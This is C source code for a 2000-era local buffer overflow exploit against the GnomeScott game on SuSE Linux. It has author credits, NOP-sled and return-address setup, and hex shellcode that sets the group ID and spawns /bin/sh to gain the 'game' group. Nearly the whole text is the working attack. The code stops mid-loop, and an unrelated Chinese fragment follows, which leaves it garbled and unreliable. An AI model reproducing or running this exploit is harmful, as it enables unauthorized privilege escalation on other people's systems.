/* GnomeScott local buffer overflow. (gid=game(40)) * * Author: Cody Tubbs (loophole of hhp). * www.hhp-programming.net / pigspigs@yahoo.com * 12/8/2000 * * This exploit was coded at overfiens in cali. * Shouts to overfien and skeptik... h00t h00t. * * Tested on SuSE 6.4/2.2.14 and 7.0/2.2.16-SMP * sgid "game"(40) by default. * */ #include #define OFFSET 0 #define NOP 0x90 #define DBUF 256 //184+RET+68 :D #define GID 40 static char shellcode[]= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0" "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31" "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08" "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69"; long get_sp(void){ __asm__("movl %esp,%eax"); } main(int argc, char **argv){ char eipeip[DBUF], buffer[4096], heh[256+1]; int i, offset, gid; long address; if(argc>1){ offset=atoi(argv[1]); }else{ offset=OFFSET; } address=get_sp()-offset; for(i=0;i

亚洲欧美在线